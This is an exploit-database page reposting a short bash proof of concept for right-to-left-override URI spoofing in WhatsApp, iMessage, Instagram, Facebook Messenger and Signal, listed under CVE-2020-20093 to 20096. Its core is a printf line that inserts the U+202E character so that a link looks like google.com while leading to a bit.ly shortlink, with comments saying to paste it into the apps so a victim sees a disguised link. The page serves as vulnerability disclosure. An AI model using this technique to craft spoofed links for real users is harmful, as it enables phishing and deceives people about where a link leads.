RTLO Injection URI Spoofing

2022.03.26
Credit: Sick Codes
Risk: Low
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096 # Date: 24/03/2022 # Exploit Authors: zadewg & Sick Codes # Vendor Homepage: https://www.meta.com # Vendor Homepage: https://www.instagram.com # Vendor Homepage: https://www.apple.com # Vendor Homepage: https://www.signal.org # Tested on: Whatsapp iOS # Version 2.19.80 and below # Tested on: Whatsapp Android # Version 2.19.222 and below # Tested on: Instagram iOS # Version: 106.0 and below # Tested on: Instagram iOS Android 107.0.0.11 # Version: 107.0.0.11 and below # Tested on: iMessage (Messages app) # Version: iOS 14.3 and below # Tested on: Facebook Messenger app iOS # Version: 227.0 and below # Tested on: Facebook Messenger app Android # Version: 228.1.0.10.116 and below # Tested on: Signal # Version: 5.33.0.25 and below # CVE: CVE-2020-20093 # CVE: CVE-2020-20094 # CVE: CVE-2020-20095 # CVE: CVE-2020-20096 #!/bin/bash # Author: sickcodes # Contact: https://twitter.com/sickcodes https://github.com/sickcodes # Copyright: sickcodes (C) 2022 # License: GPLv3+ # References: https://github.com/zadewg/RIUS # https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh # https://sick.codes/sick-2022-40 APPEAR_AS='https://google.com' DESTINATION='bit.ly/3ixIRwm' printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n" # copy paste into any of the above apps. # victim will see a surreptitious link # works on latest Signal (unpatched)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top